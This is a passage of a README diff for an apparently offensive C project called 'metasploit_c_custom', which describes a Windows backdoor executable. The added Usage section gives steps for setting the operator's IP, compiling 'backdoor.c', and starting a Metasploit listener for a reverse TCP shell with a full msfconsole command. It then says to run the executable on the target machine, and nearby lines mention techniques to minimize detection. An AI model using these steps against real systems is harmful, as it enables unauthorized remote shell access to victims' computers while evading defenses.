pentestfunctions/metasploit_c_custom/README.md

 - Customizable (IP and port can be defined at compile time)
 - Compatible with both 32-bit and 64-bit Windows

+---

+## Usage

+1. Replace `YOUR_IP_HERE` with your actual IP address
+2. Compile using `gcc -O2 backdoor.c -o github_gcc_test.exe` on a windows machine
+3. Set up a metasploit listener on your machine: `msfconsole -q -x "use exploit/multi/handler; set LHOST eth0; set LPORT 4444; set Payload generic/shell_reverse_tcp; run -j"`
+4. Run the executable on the target Windows machine

+NOTES: Change tun0 to eth0 or whatever you need for your VM environment or local network.

+---

 ## Technical Details

 The code uses several techniques to minimize detection and maintain compatibility: